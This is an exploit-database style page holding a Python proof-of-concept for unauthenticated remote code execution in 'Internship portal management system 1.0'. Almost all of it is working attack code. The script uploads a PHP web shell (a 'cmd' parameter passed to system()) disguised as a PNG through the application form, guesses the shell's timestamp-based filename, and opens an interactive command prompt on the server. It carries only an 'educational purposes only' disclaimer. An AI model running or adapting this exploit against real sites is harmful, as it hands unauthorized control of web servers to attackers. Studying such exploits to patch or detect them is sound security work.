Internship portal management system 1.0 remote code execution via file upload (unauthenticated) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-05-04 |
Type : webapps |
Platform : php
This exploit / vulnerability Internship portal management system 1.0 remote code execution via file upload (unauthenticated) is for educational purposes only and if it is used you will do on your own risk!
#change the url to the site running the vulnerable system
url="http://127.0.0.1:4000"
#burp proxy
proxies = {
"http": "http://127.0.0.1:8080",
}
#payload
payload='<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'
#the upload point
insert_url=url+"/inserty.php"
def fill_details():
global payload
global shellend
global shellstart
print("Online Intern System 1.0 Exploit: Unauth RCE via File Upload")
#time start
shellstart=int(time.time())
#print(shellstart)
files = {'file':('shell.php',payload,
'image/png', {'Content-Disposition': 'form-data'}
)
}
data = {
"company_name":"some",
"first_name":"some",
"last_name":"some",
"email":"some@some.com",
"gender":"Male",
"insert_button":"Apply",
"terms":"on"
}
r = requests.post(insert_url, data=data, files=files)
if r.status_code == 200:
print("Exploited Intern System Successfully...")
shellend = int(time.time())
#print(shellend)
shell()
else:
print("Exploit Failed")
def shell():
for shellname in range(shellstart, shellend+1):
shellstr=str(shellname)
shell_url=url+"/upload/"+shellstr+"_shell.php"
r = requests.get(shell_url)
if r.status_code == 200:
shell_url=url+"/upload/"+shellstr+"_shell.php"
break
r = requests.get(shell_url)
if r.status_code == 200:
print("Shell Starting...")
while True:
cmd=input("cmd$ ")
r = requests.get(shell_url+"?cmd="+cmd)
print(r.text)
else:
print("File Name Error")
fill_details()
Internship portal management system 1.0 remote code execution via file upload (unauthenticated)